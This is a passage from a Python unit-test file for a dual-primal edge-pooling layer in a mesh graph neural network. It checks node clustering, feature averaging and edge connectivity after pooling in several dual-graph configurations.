# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [[0, 6, 7, 10, 11], [1, 5],
[4, 13], [2, 3, 8], 9, 12]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->5 / 5->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->4 / 4->3.
self.assertEqual(num_new_primal_edges, 16)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 5], [1, 2], [1, 3], [2, 3],
[2, 5], [3, 4]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are not associated to the same
# dual node (configuration with double dual nodes).
self.assertNotEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 0--1, 0--5, 2--3 and 3--4, in both
# directions.
# - New (directed) primal edge 0->1 corresponds to old (directed)
# primal edges 0->1 and 6->5.
idx_new_dual_node = new_petdni_batch[(0, 1)]
idx_old_dual_node_1 = petdni_batch[(0, 1)]
idx_old_dual_node_2 = petdni_batch[(6, 5)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 1->0 corresponds to old (directed)
# primal edges 1->0 and 5->6.
idx_new_dual_node = new_petdni_batch[(1, 0)]
idx_old_dual_node_1 = petdni_batch[(1, 0)]
idx_old_dual_node_2 = petdni_batch[(5, 6)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 0->5 corresponds to old (directed)
# primal edges 6->12 and 11->12.
idx_new_dual_node = new_petdni_batch[(0, 5)]
idx_old_dual_node_1 = petdni_batch[(6, 12)]
idx_old_dual_node_2 = petdni_batch[(11, 12)]
# - New (directed) primal edge 5->0 corresponds to old (directed)
# primal edges 12->6 and 12->11.
idx_new_dual_node = new_petdni_batch[(5, 0)]
idx_old_dual_node_1 = petdni_batch[(12, 6)]
idx_old_dual_node_2 = petdni_batch[(12, 11)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 2->3 corresponds to old (directed)
# primal edges 4->3 and 13->8.
idx_new_dual_node = new_petdni_batch[(2, 3)]
idx_old_dual_node_1 = petdni_batch[(4, 3)]
idx_old_dual_node_2 = petdni_batch[(13, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 3->2 corresponds to old (directed)
# primal edges 3->4 and 8->13.
idx_new_dual_node = new_petdni_batch[(3, 2)]
idx_old_dual_node_1 = petdni_batch[(3, 4)]
idx_old_dual_node_2 = petdni_batch[(8, 13)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 3->4 corresponds to old (directed)
# primal edges 2->9 and 8->9.
idx_new_dual_node = new_petdni_batch[(3, 4)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(8, 9)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 4->3 corresponds to old (directed)
# primal edges 9->2 and 9->8.
idx_new_dual_node = new_petdni_batch[(4, 3)]
idx_old_dual_node_1 = petdni_batch[(9, 2)]
idx_old_dual_node_2 = petdni_batch[(9, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 4), (1, 2), (1, 3), (2, 5)]
old_dual_nodes = [(10, 9), (5, 4), (1, 2), (13, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
# 'Forward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# 'Backward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node[::-1]]
idx_old_dual_node = petdni_batch[old_dual_node[::-1]]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
] + [
petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 3), (3, 4), (3, 2), (2, 1), (1, 0),
(0, 5), (3, 4), (3, 2), (4, 0), (0, 5), (5, 2)]
] + [
new_petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (1, 3), (3, 4), (3, 2), (2, 1), (1, 0),
(0, 5), (3, 4), (3, 2), (4, 0), (0, 5), (5, 2)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - (0->1) -> (4->0);
# - (0->1) -> (5->0);
# - (0->1) -> (1->2);
# - (0->1) -> (1->3);
# - (1->0) -> (0->4);
# - (1->0) -> (0->5);
# - (1->0) -> (2->1);
# - (1->0) -> (3->1);
# - (0->4) -> (1->0);
# - (0->4) -> (5->0);
# - (0->4) -> (4->3);
# - (4->0) -> (0->1);
# - (4->0) -> (0->5);
# - (4->0) -> (3->4);
# - (0->5) -> (1->0);
# - (0->5) -> (4->0);
# - (0->5) -> (5->2);
# - (5->0) -> (0->1);
# - (5->0) -> (0->4);
# - (5->0) -> (2->5);
# - (1->2) -> (0->1);
# - (1->2) -> (3->1);
# - (1->2) -> (2->3);
# - (1->2) -> (2->5);
# - (2->1) -> (1->0);
# - (2->1) -> (1->3);
# - (2->1) -> (3->2);
# - (2->1) -> (5->2);
# - (1->3) -> (0->1);
# - (1->3) -> (2->1);
# - (1->3) -> (3->2);
# - (1->3) -> (3->4);
# - (3->1) -> (1->0);
# - (3->1) -> (1->2);
# - (3->1) -> (2->3);
# - (3->1) -> (4->3);
# - (2->3) -> (1->2);
# - (2->3) -> (5->2);
# - (2->3) -> (3->1);
# - (2->3) -> (3->4);
# - (3->2) -> (2->1);
# - (3->2) -> (2->5);
# - (3->2) -> (1->3);
# - (3->2) -> (4->3);
# - (2->5) -> (1->2);
# - (2->5) -> (3->2);
# - (2->5) -> (5->0);
# - (5->2) -> (2->1);
# - (5->2) -> (2->3);
# - (5->2) -> (0->5);
# - (3->4) -> (1->3);
# - (3->4) -> (2->3);
# - (3->4) -> (4->0);
# - (4->3) -> (3->1);
# - (4->3) -> (3->2);
# - (4->3) -> (0->4).
self.assertEqual(num_new_dual_edges, 56 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_to_neighbors = {
(0, 1): [(4, 0), (5, 0), (1, 2), (1, 3)],
(0, 4): [(1, 0), (5, 0), (4, 3)],
(0, 5): [(1, 0), (4, 0), (5, 2)],
(1, 2): [(0, 1), (3, 1), (2, 3), (2, 5)],
(1, 3): [(0, 1), (2, 1), (3, 2), (3, 4)],
(2, 3): [(1, 2), (5, 2), (3, 1), (3, 4)],
(2, 5): [(1, 2), (3, 2), (5, 0)],
(3, 4): [(1, 3), (2, 3), (4, 0)]
}
for new_dual_node, other_dual_nodes in dual_node_to_neighbors.items():
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[new_dual_node],
new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# 'Opposite' dual node.
self.assertTrue([
new_petdni_batch[new_dual_node[::-1]], new_petdni_batch[
other_dual_node[::-1]]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue([
new_petdni_batch[new_dual_node], new_petdni_batch[new_dual_node]
] in new_dual_edge_index_list)
# Self-loop of 'opposite' dual node.
self.assertTrue([
new_petdni_batch[new_dual_node[::-1]], new_petdni_batch[
new_dual_node[::-1]]
] in new_dual_edge_index_list)
def __test_large_simple_mesh_config_C_with_output_self_loops(
self,
num_primal_edges_to_keep=None,
fraction_primal_edges_to_keep=None,
primal_att_coeff_threshold=None,
use_decreasing_attention_coefficient=True,
num_heads=1):
# - Dual-graph configuration C.
single_dual_nodes = False
undirected_dual_edges = False
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
# Configuration C has double dual nodes.
self.assertNotEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, but by definition of dual-graph configuration C each
# node in the dual graph has 2 incoming edges and 2 outgoing edges.
# However, since there are no self-loops in the dual graph, each
# incoming edge for a certain dual node is also an outgoing edge for
# another dual node, and the total number of (directed) edges in the
# dual graph is 2 times the number of dual nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 2)
self.assertEqual(num_dual_nodes, num_primal_edges)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so as to pool the following
# primal edges:
# - 0->10 / 10->0;
# - 6->7 / 7->6;
# - 7->11 / 11->7;
# - 10->11 / 11->10;
# - 1->5 / 5->1;
# - 2->3 / 3->2;
# - 3->8 / 8->3;
# - 4->13 / 13->4.
# (cf. file `../../common_data/simple_mesh_large_pool_1.png`)
if (primal_att_coeff_threshold is not None):
attention_threshold = primal_att_coeff_threshold
else:
attention_threshold = 0.5
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
if (use_decreasing_attention_coefficient):
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in [[0, 10], [6, 7], [7, 11], [10, 11],
[1, 5], [2, 3], [3, 8], [4, 13]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{2, 1} = 0.7 > 0.5, but
# \alpha_{1, 2} = 0.2, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.45 < 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.2
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
else:
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) not in [[0, 10], [6, 7], [7, 11],
[10, 11], [1, 5], [2, 3],
[3, 8], [4, 13], [1, 2]]):
primal_attention_coeffs[edge_idx] += (1 -
attention_threshold)
elif (primal_edge == [1, 2]):
# Further test: set \alpha_{1, 2} = 0.4 < 0.5, but
# \alpha_{2, 1} = 0.7, so that
# (\alpha_{1, 2} + \alpha_{2, 1}) / 2 = 0.55 > 0.5, and the
# edges 1->2 / 2->1 do not get pooled.
primal_attention_coeffs[edge_idx] = 0.4
elif (primal_edge == [2, 1]):
primal_attention_coeffs[edge_idx] = 0.7
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=num_primal_edges_to_keep,
fraction_primal_edges_to_keep=fraction_primal_edges_to_keep,
primal_att_coeff_threshold=primal_att_coeff_threshold,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 6)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0, 6, 7, 10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [2, 3, 8]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node == 9):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [[0, 6, 7, 10, 11], [1, 5],
[4, 13], [2, 3, 8], 9, 12]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->5 / 5->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->4 / 4->3.
self.assertEqual(num_new_primal_edges, 16)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 5], [1, 2], [1, 3], [2, 3],
[2, 5], [3, 4]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are not associated to the same
# dual node (configuration with double dual nodes).
self.assertNotEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 0--1, 0--5, 2--3 and 3--4, in both
# directions.
# - New (directed) primal edge 0->1 corresponds to old (directed)
# primal edges 0->1 and 6->5.
idx_new_dual_node = new_petdni_batch[(0, 1)]
idx_old_dual_node_1 = petdni_batch[(0, 1)]
idx_old_dual_node_2 = petdni_batch[(6, 5)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 1->0 corresponds to old (directed)
# primal edges 1->0 and 5->6.
idx_new_dual_node = new_petdni_batch[(1, 0)]
idx_old_dual_node_1 = petdni_batch[(1, 0)]
idx_old_dual_node_2 = petdni_batch[(5, 6)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 0->5 corresponds to old (directed)
# primal edges 6->12 and 11->12.
idx_new_dual_node = new_petdni_batch[(0, 5)]
idx_old_dual_node_1 = petdni_batch[(6, 12)]
idx_old_dual_node_2 = petdni_batch[(11, 12)]
# - New (directed) primal edge 5->0 corresponds to old (directed)
# primal edges 12->6 and 12->11.
idx_new_dual_node = new_petdni_batch[(5, 0)]
idx_old_dual_node_1 = petdni_batch[(12, 6)]
idx_old_dual_node_2 = petdni_batch[(12, 11)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 2->3 corresponds to old (directed)
# primal edges 4->3 and 13->8.
idx_new_dual_node = new_petdni_batch[(2, 3)]
idx_old_dual_node_1 = petdni_batch[(4, 3)]
idx_old_dual_node_2 = petdni_batch[(13, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 3->2 corresponds to old (directed)
# primal edges 3->4 and 8->13.
idx_new_dual_node = new_petdni_batch[(3, 2)]
idx_old_dual_node_1 = petdni_batch[(3, 4)]
idx_old_dual_node_2 = petdni_batch[(8, 13)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 3->4 corresponds to old (directed)
# primal edges 2->9 and 8->9.
idx_new_dual_node = new_petdni_batch[(3, 4)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(8, 9)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 4->3 corresponds to old (directed)
# primal edges 9->2 and 9->8.
idx_new_dual_node = new_petdni_batch[(4, 3)]
idx_old_dual_node_1 = petdni_batch[(9, 2)]
idx_old_dual_node_2 = petdni_batch[(9, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 4), (1, 2), (1, 3), (2, 5)]
old_dual_nodes = [(10, 9), (5, 4), (1, 2), (13, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
# 'Forward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# 'Backward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node[::-1]]
idx_old_dual_node = petdni_batch[old_dual_node[::-1]]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
] + [
petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (1, 2), (2, 9), (3, 4), (4, 5), (
5, 6), (6, 12), (8, 9), (8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (1, 3), (3, 4), (3, 2), (2, 1), (1, 0),
(0, 5), (3, 4), (3, 2), (4, 0), (0, 5), (5, 2)]
] + [
new_petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (1, 3), (3, 4), (3, 2), (2, 1), (1, 0),
(0, 5), (3, 4), (3, 2), (4, 0), (0, 5), (5, 2)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - (0->1) -> (1->2);
# - (0->1) -> (1->3);
# - (1->0) -> (0->4);
# - (1->0) -> (0->5);
# - (0->4) -> (4->3);
# - (4->0) -> (0->1);
# - (4->0) -> (0->5);
# - (0->5) -> (5->2);
# - (5->0) -> (0->1);
# - (5->0) -> (0->4);
# - (1->2) -> (2->3);
# - (1->2) -> (2->5);
# - (2->1) -> (1->0);
# - (2->1) -> (1->3);
# - (1->3) -> (3->2);
# - (1->3) -> (3->4);
# - (3->1) -> (1->0);
# - (3->1) -> (1->2);
# - (2->3) -> (3->1);
# - (2->3) -> (3->4);
# - (3->2) -> (2->1);
# - (3->2) -> (2->5);
# - (2->5) -> (5->0);
# - (5->2) -> (2->1);
# - (5->2) -> (2->3);
# - (3->4) -> (4->0);
# - (4->3) -> (3->1);
# - (4->3) -> (3->2);
self.assertEqual(num_new_dual_edges, 28 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_to_neighbors = {
(0, 1): [(1, 2), (1, 3)],
(1, 0): [(0, 4), (0, 5)],
(0, 4): [(4, 3)],
(4, 0): [(0, 1), (0, 5)],
(0, 5): [(5, 2)],
(5, 0): [(0, 1), (0, 4)],
(1, 2): [(2, 3), (2, 5)],
(2, 1): [(1, 0), (1, 3)],
(1, 3): [(3, 2), (3, 4)],
(3, 1): [(1, 0), (1, 2)],
(2, 3): [(3, 1), (3, 4)],
(3, 2): [(2, 1), (2, 5)],
(2, 5): [(5, 0)],
(5, 2): [(2, 1), (2, 3)],
(3, 4): [(4, 0)],
(4, 3): [(3, 1), (3, 2)]
}
for new_dual_node, other_dual_nodes in dual_node_to_neighbors.items():
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[new_dual_node],
new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue([
new_petdni_batch[new_dual_node], new_petdni_batch[new_dual_node]
] in new_dual_edge_index_list)
# * Allow only non-consecutive edges.
def __test_config_A_no_output_self_loops_nonconsecutive(
self, use_decreasing_attention_coefficient=True, num_heads=1):
# - Dual-graph configuration A.
single_dual_nodes = True
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges // 2)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so that the primal edges have
# associated attention coefficients in this order:
# - 4->13 / 13->4;
# - 10->11 / 11->10;
# - 0->10 / 10->0 [not pooled, because 10->11 / 11->10 was pooled];
# - 2->3 / 3->2;
# - 3->8 / 8->3 [not pooled, because 2->3 / 3->2 was pooled];
# - 6->7 / 7->6;
# - 1->5 / 5->1;
# - 7->11 / 11->7 [not pooled, because 10->11 / 11->10 and 6->7 / 7->6
# were pooled];
# - 1->2 / 2->1 [not pooled, because 2->3 / 3->2 and 1->5 / 5->1 were
# pooled];
# - 8->9 / 9->8;
# - ... [other edges that are not pooled]
# (cf. file `../../common_data/simple_mesh_large_pool_2.png`)
attention_threshold = 0.5
edges_to_pool = [[8, 9], [1, 2], [7, 11], [1, 5], [6, 7], [3, 8],
[2, 3], [0, 10], [10, 11], [4, 13]]
if (use_decreasing_attention_coefficient):
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = attention_threshold + (
